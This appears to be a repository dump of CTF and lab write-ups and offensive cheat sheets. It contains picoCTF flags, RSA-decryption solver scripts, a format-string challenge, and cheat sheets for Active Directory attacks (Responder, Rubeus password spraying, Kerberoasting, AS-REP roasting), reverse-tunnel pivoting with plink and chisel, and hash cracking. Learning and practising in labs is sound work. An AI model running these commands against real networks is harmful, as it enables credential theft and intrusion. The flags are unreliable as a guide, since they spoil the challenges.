├── .gitignore ├── CTF ├── PicoCTF │ ├── README.md │ └── TOCHECK.md └── ractf │ ├── 01 │ ├── Mysterious Masquerading Message.md │ ├── SDN.py │ ├── encrypt.txt │ ├── id_rsa │ ├── main.c │ ├── rsa.py │ ├── rsa2.py │ └── teleport.py ├── CheatSheet ├── AD.md ├── Offensive-PS.md ├── Pivoting.md ├── Vuln-scan │ └── openVAS.md ├── cracking.md ├── enum.md ├── etc.md └── kali-setup.md ├── HackTheBox ├── EZ │ ├── arctic.md │ ├── bashed.md │ ├── bastion.md │ ├── beep.md │ ├── blocky.md │ ├── blue.md │ ├── devel.md │ ├── forest.md │ ├── friendzone.md │ ├── grandpa.md │ ├── granny.md │ ├── irked.md │ ├── jerry.md │ ├── lame.md │ ├── legacy.md │ ├── networked.md │ ├── nibbles.md │ ├── openadmin.md │ ├── optimum.md │ ├── popcorn.md │ ├── postman.md │ ├── sense.md │ ├── shocky.md │ ├── swagshop.md │ ├── traverxec.md │ └── valentine.md ├── Hard │ └── brainfuck.md ├── Medium │ ├── b64decode.py │ └── poison.md └── pic │ └── beep.png ├── NOTE ├── Active Directory basic.md ├── Attacking Kerberos.md ├── BurpSuite.md ├── SAMBA.md ├── ad │ ├── README.md │ └── attack_vectors.md ├── exploitation_basic.md ├── pics │ ├── Screenshot 2020-06-09 at 03.35.21.png │ ├── Screenshot 2020-06-18 at 02.39.25.png │ ├── Screenshot 2020-06-18 at 02.51.30.png │ ├── Screenshot 2020-06-18 at 02.55.18.png │ ├── Screenshot 2020-06-18 at 02.56.46.png │ ├── Screenshot 2020-06-18 at 17.09.43.png │ ├── Screenshot 2020-06-21 at 23.46.45.png │ ├── Screenshot 2020-06-25 at 17.33.44.png │ ├── Screenshot 2020-06-25 at 22.31.39.png │ ├── Screenshot 2020-06-25 at 22.32.01.png │ ├── enumerating_ssh.png │ ├── reverse.png │ └── transfer.png ├── recon.md ├── scanning_enumeration.md └── window-privesc │ ├── 1-enumerate.md │ ├── 2-automated-tools.md │ └── 3-kernel-exploitation.md ├── OverTheWire ├── Bandit │ └── README.md └── README.md ├── PortSwigger ├── HTTP Host header attacks.md └── Information disclosure.md ├── README.md ├── TryHackMe ├── Bounty-hacker.md ├── Easy-Peasy.md ├── Easy │ ├── AdventOfCyber │ │ ├── README.md │ │ 
├── day16.py │ │ ├── files.zip │ │ ├── final-final-compressed.zip │ │ └── getflag.py │ ├── AdventOfCyber2 │ │ ├── Day1.md │ │ ├── Day10.md │ │ ├── Day11.md │ │ ├── Day12.md │ │ ├── Day13.md │ │ ├── Day14.md │ │ ├── Day2.md │ │ ├── Day3.md │ │ ├── Day4.md │ │ ├── Day5.md │ │ ├── Day7.md │ │ ├── Day8.md │ │ └── Day9.md │ ├── Agent-sudo.md │ ├── Alfred.md │ ├── Anthem.md │ ├── B99.md │ ├── Badbyte1.md │ ├── Blue.md │ ├── Break Out The Cage.md │ ├── CrackTheHash.md │ ├── Hydra.md │ ├── Inclusion.md │ ├── Injection.md │ ├── JuiceShop.md │ ├── Kenobi.md │ ├── LianYu.md │ ├── Linux-Challenges.md │ ├── OWASP-Top-10.md │ ├── OverPass.md │ ├── Overpass-2.md │ ├── Pickle-Rick.md │ ├── Pokemon.md │ ├── PostExploitationBasics.md │ ├── RP: Metasploit.md │ ├── RP:Nmap.md │ ├── Smag-Grotto.md │ ├── Steel-Mountain.md │ ├── XXE.md │ ├── ad.md │ ├── bolt.md │ ├── gamezone.md │ ├── gaming-server.md │ ├── git_happen.md │ ├── ice.md │ ├── kiba.md │ ├── madness_beginner.md │ ├── rootme.md │ ├── skynet.md │ ├── smaggrotto.md │ ├── startup.md │ ├── sudovulnsbof.md │ ├── sudovulnsbypass.md │ ├── tartarus.md │ ├── tomghost.md │ └── vulnUniversity.md ├── Hard │ ├── Daily-Bugle.md │ └── Jack.md ├── Medium │ ├── Anonymous.md │ ├── Blog.md │ ├── BoilerCTF.md │ ├── HackPark.md │ ├── Harder.md │ ├── LinuxPrivEsc │ │ ├── README.md │ │ ├── bash_blackdoor.sh │ │ ├── library_path.c │ │ ├── preload.c │ │ └── spawn_bash.c │ ├── Wonderland.md │ ├── biohazard.md │ ├── ctf100.md │ ├── dogcat.md │ ├── gatekeeper.md │ ├── hackerNote.md │ ├── joker.md │ ├── mr_robot.md │ ├── peakhill.md │ ├── webappsec101.md │ └── wwbuddy.md ├── Throwback │ ├── CORPORATE.LOCAL │ │ ├── ADT01.md │ │ └── DC01.md │ ├── FW01.md │ ├── README.md │ ├── THROWBACK.LOCAL │ │ ├── DC01.md │ │ ├── MAIL.md │ │ ├── PROD.md │ │ ├── TIME.md │ │ └── WS01.md │ ├── pic │ │ └── topo.png │ └── user.md └── pic │ ├── Screenshot 2020-07-01 at 20.27.20.png │ ├── Screenshot 2020-07-01 at 20.29.45.png │ ├── Screenshot 2020-07-01 at 21.51.16.png │ ├── 
Screenshot 2020-07-04 at 21.44.54.png │ ├── Screenshot 2020-07-04 at 22.26.02.png │ ├── Screenshot 2020-07-05 at 13.22.12.png │ ├── Screenshot 2020-07-05 at 13.25.30.png │ ├── Screenshot 2020-07-05 at 13.27.02.png │ ├── Screenshot 2020-07-05 at 13.39.02.png │ ├── Screenshot 2020-07-14 at 23.43.20.png │ ├── Screenshot 2020-07-14 at 23.43.27.png │ ├── Screenshot 2020-07-14 at 23.43.34.png │ ├── Screenshot 2020-07-14 at 23.43.41.png │ ├── Screenshot 2020-07-17 at 15.09.11.png │ ├── Screenshot 2020-07-17 at 20.40.46.png │ ├── Screenshot 2020-07-18 at 19.57.57.png │ ├── Screenshot 2020-07-18 at 20.20.56.png │ ├── Screenshot 2020-07-27 at 12.32.50.png │ ├── Screenshot 2020-08-01 at 16.16.24.png │ ├── Screenshot 2020-08-01 at 16.27.25.png │ ├── Screenshot 2020-08-01 at 17.25.20.png │ ├── Screenshot 2020-08-07 at 19.42.36.png │ ├── Screenshot 2020-08-07 at 19.43.14.png │ ├── Screenshot 2020-08-08 at 16.44.37.png │ ├── Screenshot 2020-08-19 at 15.47.18.png │ ├── Screenshot 2020-08-20 at 12.51.55.png │ ├── Screenshot 2020-08-20 at 18.06.57.png │ ├── capture-1.png │ ├── pwfeedback-demo.png │ └── sudo-demo.png └── meAndMyGf1 ├── README.md └── pic ├── alice.png ├── button.png ├── home.png ├── html.png ├── profile.png └── target.png /.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store 2 | .code-workspace 3 | 4 | writeUp.code-workspace 5 | 6 | 7 | TryHackMe/AdventOfCyber/final-final-compressed.zip 8 | 9 | TryHackMe/AdventOfCyber/extracted/ 10 | 11 | TryHackMe/AdventOfCyber/final-final-compressed/ 12 | 13 | .vscode/.ropeproject/config.py 14 | 15 | .vscode/.ropeproject/objectdb 16 | 17 | TryHackMe/AdventOfCyber/files.zip 18 | 19 | TryHackMe/AdventOfCyber/files/challenge1 20 | 21 | TryHackMe/AdventOfCyber/files/file1 22 | 23 | TryHackMe/pic/Search | Splunk 8.0.5-filer/ 24 | 25 | TryHackMe/Easy/AdventOfCyber/extracted/ 26 | 27 | TryHackMe/Easy/AdventOfCyber/files/ 28 | 29 | TryHackMe/Easy/AdventOfCyber/final-final-compressed/ 30 
| 31 | HackTheBox/Easy/ 32 | 33 | HackTheBox/buff.md 34 | 35 | HackTheBox/docter.md 36 | 37 | CTF/pic/Screenshot 2020-10-07 at 20.50.42.png 38 | 39 | CTF/juicebox.md 40 | -------------------------------------------------------------------------------- /CTF/PicoCTF/README.md: -------------------------------------------------------------------------------- 1 | # Bases 2 | ```console 3 | kuroHat@pico-2019-shell1:~$ echo 'bDNhcm5fdGgzX3IwcDM1' | base64 -d 4 | l3arn_th3_r0p35 5 | ``` 6 | 7 | # Fist grep 8 | ```console 9 | cd /problems/first-grep_1_6788154ca7ee937f569985ff397203b6 10 | kuroHat@pico-2019-shell1:/problems/first-grep_1_6788154ca7ee937f569985ff397203b6$ cat file | grep picoCTF 11 | picoCTF{grep_is_good_to_find_things_205b65d7} 12 | ``` 13 | # dont-use-client-side 14 | ```js 15 | if (checkpass.substring(0, split) == 'pico') { 16 | if (checkpass.substring(split*6, split*7) == 'a60f') { 17 | if (checkpass.substring(split, split*2) == 'CTF{') { 18 | if (checkpass.substring(split*4, split*5) == 'ts_p') { 19 | if (checkpass.substring(split*3, split*4) == 'lien') { 20 | if (checkpass.substring(split*5, split*6) == 'lz_4') { 21 | if (checkpass.substring(split*2, split*3) == 'no_c') { 22 | if (checkpass.substring(split*7, split*8) == '3}') { 23 | alert("Password Verified") 24 | } 25 | } 26 | } 27 | 28 | } 29 | } 30 | } 31 | } 32 | } 33 | ``` 34 | ```picoCTF{no_clients_plz_4a60f3}``` 35 | 36 | -------------------------------------------------------------------------------- /CTF/PicoCTF/TOCHECK.md: -------------------------------------------------------------------------------- 1 | ```console 2 | pidof 3 | pkill 4 | nikto 5 | ``` 6 | 7 | 8 | -------------------------------------------------------------------------------- /CTF/ractf/01: -------------------------------------------------------------------------------- 1 | LHFKM GMRHC FLMMJ ULXFY JOUFC 2 | FQFXF ZJOKP JOMMU LMRJT FFTBA 3 | JYFFR JZFXG AWJCB ULXFI FFKRF 4 | KPGKH RFWCF MTFRR LHFRI FMQFF 5 | KFLWU JMUFC 
IOMMU FYCFF KWCYB 6 | MFPQF CFHJG KHMJK FFPMJ PFWCY 7 | BMMUF TMJQJ CVJOM GZMUF CFRRJ 8 | TFMUG KHGAA FHLAH JGKHJ KLKPH 9 | FMMUF TLCCF RMFPK JCTLA YMUFW 10 | CYBMJ HCLBU YMFLT QJOAP PJMUG 11 | RIOMM UFYXF LAAPF WGPFP LMMUF 12 | RLTFM GTFMJ HJJKL KOLAA FLXFI 13 | FRMJZ AOWVL HFKMI MUFRF WCFMW 14 | JPFGR PJWOT FKMR -------------------------------------------------------------------------------- /CTF/ractf/Mysterious Masquerading Message.md: -------------------------------------------------------------------------------- 1 | tbbq yhpx:) 2 | 3 | -----BEGIN OPENSSH PRIVATE KEY----- 4 | SWYgeW91IGFyZSByZWFkaW5nIHRoaXMsIHRoZW4geW91IHByb2JhYmx5IGZ 5 | pZ3VyZWQgb3V0IHRoYXQgaXQgd2Fzbid0IGFjdHVhbGx5IGFuIFNTSCBrZX 6 | kgYnV0IGEgZGlzZ3Vpc2UuIFNvIHlvdSBoYXZlIG1hZGUgaXQgdGhpcyBmY 7 | XIgYW5kIGZvciB0aGF0IEkgc2F5IHdlbGwgZG9uZS4gSXQgd2Fzbid0IHZl 8 | cnkgaGFyZCwgdGhhdCBJIGtub3csIGJ1dCBuZXZlcnRoZWxlc3MgeW91IGh 9 | hdmUgc3RpbGwgbWFkZSBpdCBoZXJlIHNvIGNvbmdyYXRzLiBOb3cgeW91IG 10 | FyZSBwcm9iYWJseSByZWFkaW5nIHRoaXMgYW5kIHRoaW5raW5nIGFib3V0I 11 | GFubm95aW5nIHRoZSBwZXJzb24gd2hvIG1hZGUgdGhpcywgYW5kIHlvdSB3 12 | YW50IHRvIHJlYWQgdGhlIHdob2xlIHRoaW5nIHRvIGNoZWNrIGZvciBjbHV 13 | lcywgYnV0IHlvdSBjYW50IGZpbmQgYW55LiBZb3UgYXJlIHN0YXJ0aW5nIH 14 | RvIGdldCBmcnVzdHJhdGVkIGF0IHRoZSBwZXJzb24gd2hvIG1hZGUgdGhpc 15 | yBhcyB0aGV5IHN0aWxsIGhhdmVuJ3QgbWVudGlvbmVkIGFueXRoaW5nIHRv 16 | IGRvIHdpdGggdGhlIGNoYWxsZW5nZSwgZXhjZXB0ICJ3ZWxsIGRvbmUgeW9 17 | 1IGhhdmUgZ290IHRoaXMgZmFyIi4gWW91IHN0YXJ0IHNsYW1taW5nIGRlc2 18 | tzLCBhbmQgc29vbiB0aGUgbW9uaXRvciB3aWxsIGZvbGxvdy4gWW91IGFyZ 19 | SB3b25kZXJpbmcgd2hlcmUgdGhpcyBpcyBnb2luZyBhbmQgcmVhbGlzaW5n 20 | IGl0J3MgY29taW5nIHRvIHRoZSBlbmQgb2YgdGhlIHBhcmFncmFwaCwgYW5 21 | kIHlvdSBtaWdodCBub3QgaGF2ZSBzZWVuIGFueXRoaW5nLiBJIGhhdmUgZ2 22 | l2ZW4geW91IHNvbWUgdGhpbmdzLCBhbHRob3VnaCB5b3Ugd2lsbCBuZWVkI 23 | HNvbWV0aGluZyBlbHNlIGFzIHdlbGwgZ29vZCBsdWNrLiAKNjk2ZTY1NjU2 24 | NDc0NmY2ZjcwNjU2ZTZjNmY2MzZiNzMKNjk2ZTY5NzQ2OTYxNmM2OTczNjE 25 | 3NDY5NmY2ZTMxMzI= 26 | -----END OPENSSH PRIVATE 
KEY-----

00111001 00110000 00111001 00111000 00111000 01100011 00111001 01100010
01100101 01100110 01100101 00110101 01100101 01100001 00110011 01100110
00110101 01100001 00111001 00110001 01100101 01100110 01100110 01100101
00110000 00110011 00110000 00110110 00110000 01100001 00111000 00110111
00110001 00110100 01100100 01100110 01100011 00110010 00110000 00110000
00111000 00111000 00110100 00110001 00110101 00110101 00110111 00110000
01100010 00110011 00111001 00110100 01100011 01100101 00111001 01100011
01100100 00110011 00110010 01100010 01100101 00110111 00110001 00111000

90988c9befe5ea3f5a91effe03060a8714dfc20088415570b394ce9cd32be718

--------------------------------------------------------------------------------
/CTF/ractf/SDN.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/kurohat/writeUp/438003d46e13c27bcafb4136b75344c2af39f762/CTF/ractf/SDN.py
--------------------------------------------------------------------------------
/CTF/ractf/encrypt.txt:
--------------------------------------------------------------------------------
90988c9befe5ea3f5a91effe03060a8714dfc20088415570b394ce9cd32be718
--------------------------------------------------------------------------------
/CTF/ractf/id_rsa:
--------------------------------------------------------------------------------
-----BEGIN PRIVATE KEY-----
SWYgeW91IGFyZSByZWFkaW5nIHRoaXMsIHRoZW4geW91IHByb2JhYmx5IGZ
pZ3VyZWQgb3V0IHRoYXQgaXQgd2Fzbid0IGFjdHVhbGx5IGFuIFNTSCBrZX
kgYnV0IGEgZGlzZ3Vpc2UuIFNvIHlvdSBoYXZlIG1hZGUgaXQgdGhpcyBmY
XIgYW5kIGZvciB0aGF0IEkgc2F5IHdlbGwgZG9uZS4gSXQgd2Fzbid0IHZl
cnkgaGFyZCwgdGhhdCBJIGtub3csIGJ1dCBuZXZlcnRoZWxlc3MgeW91IGh
hdmUgc3RpbGwgbWFkZSBpdCBoZXJlIHNvIGNvbmdyYXRzLiBOb3cgeW91IG
FyZSBwcm9iYWJseSByZWFkaW5nIHRoaXMgYW5kIHRoaW5raW5nIGFib3V0I
GFubm95aW5nIHRoZSBwZXJzb24gd2hvIG1hZGUgdGhpcywgYW5kIHlvdSB3
YW50IHRvIHJlYWQgdGhlIHdob2xlIHRoaW5nIHRvIGNoZWNrIGZvciBjbHV
lcywgYnV0IHlvdSBjYW50IGZpbmQgYW55LiBZb3UgYXJlIHN0YXJ0aW5nIH
RvIGdldCBmcnVzdHJhdGVkIGF0IHRoZSBwZXJzb24gd2hvIG1hZGUgdGhpc
yBhcyB0aGV5IHN0aWxsIGhhdmVuJ3QgbWVudGlvbmVkIGFueXRoaW5nIHRv
IGRvIHdpdGggdGhlIGNoYWxsZW5nZSwgZXhjZXB0ICJ3ZWxsIGRvbmUgeW9
1IGhhdmUgZ290IHRoaXMgZmFyIi4gWW91IHN0YXJ0IHNsYW1taW5nIGRlc2
tzLCBhbmQgc29vbiB0aGUgbW9uaXRvciB3aWxsIGZvbGxvdy4gWW91IGFyZ
SB3b25kZXJpbmcgd2hlcmUgdGhpcyBpcyBnb2luZyBhbmQgcmVhbGlzaW5n
IGl0J3MgY29taW5nIHRvIHRoZSBlbmQgb2YgdGhlIHBhcmFncmFwaCwgYW5
kIHlvdSBtaWdodCBub3QgaGF2ZSBzZWVuIGFueXRoaW5nLiBJIGhhdmUgZ2
l2ZW4geW91IHNvbWUgdGhpbmdzLCBhbHRob3VnaCB5b3Ugd2lsbCBuZWVkI
HNvbWV0aGluZyBlbHNlIGFzIHdlbGwgZ29vZCBsdWNrLiAKNjk2ZTY1NjU2
NDc0NmY2ZjcwNjU2ZTZjNmY2MzZiNzMKNjk2ZTY5NzQ2OTYxNmM2OTczNjE
3NDY5NmY2ZTMxMzI=
-----END PRIVATE KEY-----
--------------------------------------------------------------------------------
/CTF/ractf/main.c:
--------------------------------------------------------------------------------
```c
#include <stdio.h>

// This challenge should be a fun one!

// Compile with
// gcc main.c
// then run with
// ./a.out

int main()
{
    int show_the_flag = 0;

    // Pull in the flag using some pre-processor hacks!
    // (flag.txt is expected to hold a quoted C string literal)
    char *flag =
#include "flag.txt"
    ;

    if (show_the_flag)
    {
        // the flag string is used directly as the printf format string
        printf(flag);
    }
    else
    {
        while (1)
        {
            printf("Youneedtofindtheflag!");
        }
    }

    printf("Something went wrong!");
    return 0;
}
```
--------------------------------------------------------------------------------
/CTF/ractf/rsa.py:
--------------------------------------------------------------------------------
```python
from pwn import *

# Full-size parameters (p, q, e, ct) as recorded in the comments of the committed script.
# They are the only complete set in the file, so they are the active ones here.
p = 12736417496736655442602617267963357620825841853712732906895398885696709839309257918168226091994953634497776446017624975845723070057111835461641254269269317
q = 12812745834802942067887996082863564857775464236327866229873820064310547028668532363402551825083254446602822350152834784435994127878640673106783300383715213

e = 65537

ct = 36164077670048236315620165241501158490714780378828495489466034792516124438008544795706435407727196245542440722207946911741455419825341977882668518715641221655547701335758290288192516019599540143387244434109169262921709528678398951068201747253902131176016425711977353198578765688585598616779744281471591815486

# Leftover of an unfinished small-prime variant, kept as committed: the list below lost its
# variable name and its leading values, so it is left commented out rather than guessed at.
# p = 1299811
# q = 1299827
# 1416088155477,1187894346607,1187894346607,1012248725317,1642686319107, 1299736156328, 1176348111078, 1566932379421, 976078105770,1041712991086,976078105770,164477670995,1176348111078,1533726616075,457718175500, 766162619069 ]


def egcd(a, b):
    # extended Euclid: returns (g, x, y) with a*x + b*y == g == gcd(a, b)
    if a == 0:
        return (b, 0, 1)
    else:
        g, y, x = egcd(b % a, a)
        return (g, x - (b // a) * y, y)


def modinv(a, m):
    # modular inverse of a mod m, only defined when gcd(a, m) == 1
    g, x, y = egcd(a, m)
    if g != 1:
        raise Exception('modular inverse does not exist')
    else:
        return x % m


totient = (p - 1) * (q - 1)
n = p * q
# print(n)
d = modinv(e, totient)          # private exponent
m = pow(ct, d, n)               # RSA decryption: m = ct^d mod n
flag = unhex(hex(m)[2:])        # the plaintext integer is the flag's bytes
print('hex: ' + hex(m))
print('get only hex code: ' + hex(m)[2:])
print('unhex it: ' + flag.decode())
```
--------------------------------------------------------------------------------
/CTF/ractf/rsa2.py:
--------------------------------------------------------------------------------
```python
from pwn import *

# n = 1209143407476550975641959824312993703149920344437422193042293131572745298662696284279928622412441255652391493241414170537319784298367821654726781089600780498369402167443363862621886943970468819656731959468058528787895569936536904387979815183897568006750131879851263753496120098205966442010445601534305483783759226510120860633770814540166419495817666312474484061885435295870436055727722073738662516644186716532891328742452198364825809508602208516407566578212780807
e = 30802007917952508422792869021689193927485016332713622527025219105154254472344627284947779726280995431947454292782426313255523137610532323813714483639434257536830062768286377920010841850346837238015571464755074669373110411870331706974573498912126641409821855678581804467608824177508976254759319210955977053997
ct = 44641914821074071930297814589851746700593470770417111804648920018396305246956127337150936081144106405284134845851392541080862652386840869768622438038690803472550278042463029816028777378141217023336710545449512973950591755053735796799773369044083673911035030605581144977552865771395578778515514288930832915182

# http://factordb.com/index.php?query=58900433780152059829684181006276669633073820320761216330291745734792546625247

p = 7493025776465062819629921475535241674460826792785520881387158343265274170009282504884941039852933109163193651830303308312565580445669284847225535166520307
q = 7020854527787566735458858381555452648322845008266612906844847937070333480373963284146649074252278753696897245898433245929775591091774274652021374143174079


def egcd(a, b):
    # extended Euclid: returns (g, x, y) with a*x + b*y == g == gcd(a, b)
    if a == 0:
        return (b, 0, 1)
    else:
        g, y, x = egcd(b % a, a)
        return (g, x - (b // a) * y, y)


def modinv(a, m):
    # modular inverse of a mod m, only defined when gcd(a, m) == 1
    g, x, y = egcd(a, m)
    if g != 1:
        raise Exception('modular inverse does not exist')
    else:
        return x % m


n = p * q
totient = (p - 1) * (q - 1)
d = modinv(e, totient)          # private exponent
m = pow(ct, d, n)               # RSA decryption: m = ct^d mod n

flag = unhex(hex(m)[2:])
print('plaintext: ' + flag.decode())
```
--------------------------------------------------------------------------------
/CTF/ractf/teleport.py:
--------------------------------------------------------------------------------
```python
import math

x = 0.0
z = 0.0
flag_x = 10000000000000.0
flag_z = 10000000000000.0
print("Your player is at 0,0")
print("The flag is at 10000000000000, 10000000000000")
print("Enter your next position in the form x,y")
print("You can move a maximum of 10 metres at a time")
for _ in range(100):
    print(f"Current position: {x}, {z}")
    try:
        move = input("Enter next position(maximum distance of 10): ").split(",")
        new_x = float(move[0])
        new_z = float(move[1])
    except Exception:
        continue
    diff_x = new_x - x
    diff_z = new_z - z
    dist = math.sqrt(diff_x ** 2 + diff_z ** 2)
    print(dist)
    if dist > 10:
        print("You moved too far")
    else:
        x = new_x
        z = new_z
    if x == 10000000000000 and z == 10000000000000:
        print("ractf{#####################}")
        break
```
--------------------------------------------------------------------------------
/CheatSheet/AD.md:
--------------------------------------------------------------------------------
# responder
```console
$ cat /etc/responder/Responder.conf | grep SMB # if OFF change to ON
SMB = ON
$ sudo responder -I tun0 -rdw -v
```
- r: enables NetBIOS wredir suffix queries
- d: enables NetBIOS domain suffix queries
- w: starts the WPAD rogue proxy server
- v: verbose

# Attacking Kerberos
## kerbrute: user enum
```console
$ ./kerbrute userenum --dc example.local -d example.local users.txt
```
https://github.com/GhostPack/Rubeus
## Harvesting Tickets
on victim machine
```powershell
$ ./Rubeus.exe harvest /interval:30 # harvest for TGTs every 30 seconds
```
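The move check in teleport.py (CTF/ractf, above) only refuses a move when `dist > 10`, and every comparison involving a NaN float is False, so a NaN position is accepted and from a NaN position every later position is accepted too. This added example (not the challenge author's code) replays that game loop with the original check beside a hardened one that rejects non-finite input and states the acceptance condition positively; the move strings are constructed for the demonstration.

```python
import math

# Flag position from teleport.py
FLAG_POS = (10000000000000.0, 10000000000000.0)


def move_is_rejected_naive(x, z, new_x, new_z):
    """The check exactly as teleport.py writes it: refuse the move only when dist > 10.

    With NaN anywhere in the arithmetic, dist is NaN and `NaN > 10` is False,
    so the move is accepted.
    """
    dist = math.sqrt((new_x - x) ** 2 + (new_z - z) ** 2)
    return dist > 10


def move_is_rejected_hardened(x, z, new_x, new_z):
    """Same rule, but written so that NaN or infinite input cannot slip through."""
    # 1. refuse anything that is not a finite number before doing arithmetic on it
    if not all(math.isfinite(v) for v in (x, z, new_x, new_z)):
        return True
    dist = math.sqrt((new_x - x) ** 2 + (new_z - z) ** 2)
    # 2. state the *allowed* case and negate it: a NaN dist now fails `dist <= 10`
    return not (dist <= 10)


def play(moves, rejected=move_is_rejected_naive):
    """Replay a list of 'x,z' input strings through the game loop; return the final position."""
    x, z = 0.0, 0.0
    for move in moves:
        try:
            parts = move.split(",")
            new_x, new_z = float(parts[0]), float(parts[1])   # float() accepts "nan" and "inf"
        except (ValueError, IndexError):
            continue
        if not rejected(x, z, new_x, new_z):
            x, z = new_x, new_z
        if (x, z) == FLAG_POS:
            break
    return x, z


def reached_flag(pos):
    return pos == FLAG_POS


if __name__ == "__main__":
    # constructed input: one NaN move, then a jump straight to the flag
    nan_then_flag = ["nan,nan", "10000000000000,10000000000000"]
    print("naive check    :", play(nan_then_flag))                              # flag position
    print("hardened check :", play(nan_then_flag, move_is_rejected_hardened))   # still (0.0, 0.0)
```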
## Brute-Forcing / Password-Spraying
Before password spraying with Rubeus, you need to add the domain controller's domain name to the Windows hosts file. You can add the IP and domain name to the hosts file from the machine by using the echo command: ```echo example.local >> C:\Windows\System32\drivers\etc\hosts```
```powershell
$ ./Rubeus.exe brute /password: /noticket # This will take a given password and "spray" it against all found users, then give the .kirbi TGT for each user it works for
```
# Kerberoasting
on kali, `hashcat -m 13100`
## Rubeus
on victim machine
```powershell
$ ./Rubeus.exe kerberoast
```
## Impacket
```console
$ sudo python3 GetUserSPNs.py example.local/username:password -dc-ip $IP -request
```
# AS-REP Roasting
on kali, `hashcat -m 18200`
## Rubeus
on victim machine
```powershell
$ ./Rubeus.exe asreproast
```
--------------------------------------------------------------------------------
/CheatSheet/Offensive-PS.md:
--------------------------------------------------------------------------------
# Table of Contents
- [Table of Contents](#table-of-contents)
- [intro](#intro)
  - [importing modules](#importing-modules)
  - [Get-ADDomain](#get-addomain)
  - [Get-ADForest](#get-adforest)
  - [Get-ADTrust](#get-adtrust)
- [PowerView](#powerview)
  - [Get-NetDomain](#get-netdomain)
  - [Get-NetDomainController](#get-netdomaincontroller)
  - [Get-NetForest](#get-netforest)
  - [Get-NetDomainTrust](#get-netdomaintrust)

# intro
## importing modules
start by importing the `ActiveDirectory` module
```
Import-Module
Import-Module ActiveDirectory
. .\Module.ps1
```
## Get-ADDomain
- lists all of the Domain Controllers for a given environment and tells you the NetBIOS domain name and the FQDN (Fully Qualified Domain Name)
```
Get-ADDomain
Get-ADDomain | Select-Object NetBIOSName, DNSRoot, InfrastructureMaster # filtering
```
## Get-ADForest
pulls all the Domains within a Forest and lists them out to the user. This may be useful if a bidirectional trust is set up, since it may allow you to gain a foothold in another domain on the LAN. Filter it just like Get-ADDomain:
```
Get-ADForest
Get-ADForest | Select-Object Domains
```
## Get-ADTrust
Get-ADTrust provides a ton of information about the Trusts within the AD Domain. It can tell you if it's a one-way or bidirectional trust, who the source is, who the target is, and much more.
```
Get-ADTrust -Filter * | Select-Object Direction,Source,Target
```
# PowerView
- https://github.com/PowerShellMafia/PowerSploit
- kali: `/usr/share/windows-resources/powersploit`
```console
$ Import-Module .\PowerView.ps1
```
## Get-NetDomain
Basic info such as the Forest, Domain Controllers, and Domain Name is enumerated.
```console
$ Get-NetDomain
```
## Get-NetDomainController
lists all of the Domain Controllers within the network. This is incredibly useful for initial reconnaissance, especially if you do not have a Windows device that's joined to the domain.
```console
$ Get-NetDomainController
```
## Get-NetForest
It provides all the associated Domains, the root domain, as well as the Domain Controllers for the root domain.
```console
$ Get-NetForest
```
## Get-NetDomainTrust
Get-NetDomainTrust is similar to Get-ADTrust with our Select-Object filter applied to it. It's short, sweet and to the point!
62 | ```console 63 | $ Get-NetDomainTrust 64 | ``` -------------------------------------------------------------------------------- /CheatSheet/Pivoting.md: -------------------------------------------------------------------------------- 1 | # msfconsole 2 | * meterpreter session is requried 3 | ## Auto-Routing 4 | ``` 5 | background 6 | use post/multi/manage/autoroute 7 | set SESSION X 8 | set SUBNET x.x.x.0 9 | exploit 10 | ``` 11 | ## Setting up a Proxy 12 | 1. use `auxiliary/server/socks4a` 13 | 2. (optional) Change you port, you can either keep the default 1080 port or change it to an open port of your choice. 14 | 3. `run` 15 | 16 | # Proxy Chain 17 | 1. sudo nano /etc/proxychains.conf > socks4 socks4 127.0.0.1 18 | 1. the same port that you specify when `auxiliary/server/socks4a` 19 | 2. now run `proxychains ` 20 | 21 | # plink.exe 22 | ``` 23 | plink.exe -ssh -l kali -pw kali -N -R 10.10.14.43:8888:127.0.0.1:8888 10.10.14.43 24 | ``` 25 | 26 | # chisel.exe 27 | ``` 28 | ./chisel.exe client 10.10.14.43:8080 R:8888:127.0.0.1:8888 29 | ./chisel.exe client 10.10.14.43:8888 R:8888:127.0.0.1:8888 30 | ./chisel client 10.10.14.43:8080 R:8888:127.0.0.1:8888 31 | ``` -------------------------------------------------------------------------------- /CheatSheet/Vuln-scan/openVAS.md: -------------------------------------------------------------------------------- 1 | # installing 2 | ```console 3 | root@kali:~# apt-get update 4 | root@kali:~# apt-get dist-upgrade 5 | root@kali:~# sudo apt install gvm -y # sudo apt install openvas -y 6 | root@kali:~# sudo gvm-setup 7 | ``` 8 | **user admin:password is create here, copy ur password and save it somewhere** 9 | 10 | Once gvm-setup completes its process, the OpenVAS manager, scanner, and GSAD services should be listening: 11 | ```console 12 | root@kali:~# netstat -antp # should shows the output below 13 | Active Internet connections (servers and established) 14 | Proto Recv-Q Send-Q Local Address Foreign Address State 
PID/Program name 15 | tcp 0 0 127.0.0.1:9390 0.0.0.0:* LISTEN 9583/openvasmd 16 | tcp 0 0 127.0.0.1:9391 0.0.0.0:* LISTEN 9570/openvassd: Wai 17 | tcp 0 0 127.0.0.1:9392 0.0.0.0:* LISTEN 9596/gsad 18 | ``` 19 | # using 20 | ``` 21 | root@kali:~# openvas-start 22 | root@kali:~# openvas-stop 23 | ``` 24 | 25 | gvmd --create-user=kali --password=kali --role=Admin 26 | 27 | - resource 28 | - [installing](https://www.kali.org/penetration-testing/openvas-vulnerability-scanning/) 29 | - https://dannyda.com/2020/08/07/how-to-fix-openvas-command-not-found-in-kali-linux-2020-2a/ 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | -------------------------------------------------------------------------------- /CheatSheet/cracking.md: -------------------------------------------------------------------------------- 1 | # Colabcat 2 | [youtube](https://www.youtube.com/watch?v=pYOncitu7W8) guide how to use this tool. here is what you need to do 3 | 1. Click on `Runtime`, `Change runtime type`, and set `Hardware accelerator` to GPU. 4 | 2. Go to your Google Drive and create a directory called `dothashcat`, with a `hashes` subdirectory where you can store hashes. 5 | 3. Upload [rule](https://github.com/NotSoSecure/password_cracking_rules/blob/master/OneRuleToRuleThemAll.rule) and your hashes in `hashes` subdirectory. 6 | 4. Come back to Google Colab, click on `Runtime` and then `Run all`. 7 | 5. When it asks for a Google Drive *token*, go to the link it provides and authenticate with your Google Account to get the token 8 | 6. add code cell (`+code`) 9 | 7. run `!bash` and press play button 10 | 8. 
